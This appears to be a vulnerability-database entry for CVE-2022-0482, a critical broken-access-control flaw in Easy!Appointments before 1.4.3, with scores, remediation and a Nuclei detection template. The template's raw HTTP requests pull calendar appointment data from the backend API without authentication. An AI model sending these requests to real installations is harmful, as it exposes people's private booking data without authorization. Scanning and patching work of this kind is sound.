Easy!Appointments <1.4.3 - Broken Access Control

2022-04-0915:49:47

ProjectDiscovery

github.com

cve2022 easyappointments huntr wordpress unauthorized sensitive data access fix

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

9.2

Confidence

High

EPSS

0.244

Percentile

96.7%

JSON

Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.

id: CVE-2022-0482

info:
  name: Easy!Appointments <1.4.3 - Broken Access Control
  author: francescocarlucci,opencirt
  severity: critical
  description: |
    Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions.
  remediation: |
    Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability.
  reference:
    - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
    - https://github.com/alextselegidis/easyappointments
    - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
    - https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2022-0482
    cwe-id: CWE-359,CWE-863
    epss-score: 0.04316
    epss-percentile: 0.91494
    cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: easyappointments
    product: easyappointments
    framework: wordpress
  tags: cve,cve2022,easyappointments,huntr,wordpress

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"appointments":'
          - '"unavailables":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        name: csrf_token
        internal: true
        kval:
          - "csrfCookie"
        part: header
# digest: 4a0a0047304502204a46c8ad322e2152ca6650f96039b6f980bed5ddd8cb8cd26ca2fea57efaa24f022100cdd4517ef3e2e11a22c74c4fa7a445447d16471f0c87bab1bae7b6901321c33f:922c64590222798bb761d5b6d8e72950